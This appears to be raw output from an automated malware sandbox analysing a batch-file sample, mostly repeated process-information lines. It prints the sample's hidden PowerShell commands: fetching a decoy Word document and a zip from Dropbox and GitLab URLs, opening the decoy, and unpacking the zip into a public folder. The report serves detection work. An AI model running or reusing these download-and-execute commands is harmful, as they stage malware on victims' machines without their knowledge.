            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbft source: powershell.exe, 0000000D.00000002.1401370832.000001876A28C000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 18cut04.bat, type: SAMPLE
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bose1511/mkt1511/-/raw/main/18Fukrun.zip', 'C:\Users\Public\Document.zip')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bose1511/mkt1511/-/raw/main/18Fukrun.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAAC312330 pushad ; iretd 15_2_00007FFAAC31236D

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bose1511/mkt1511/-/raw/main/18Fukrun.zip', 'C:\Users\Public\Document.zip')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bose1511/mkt1511/-/raw/main/18Fukrun.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ocb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_ARC4.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_aes.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_chacha20.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ofb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ctr.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Crypto\Util\_strxor.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_arc2.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_blowfish.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_cbc.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_cfb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Crypto\Util\_cpuid_c.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_cast.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_pkcs1_decode.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_des.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_aesni.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ecb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_des3.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_Salsa20.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_eksblowfish.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\LICENSE.txtJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
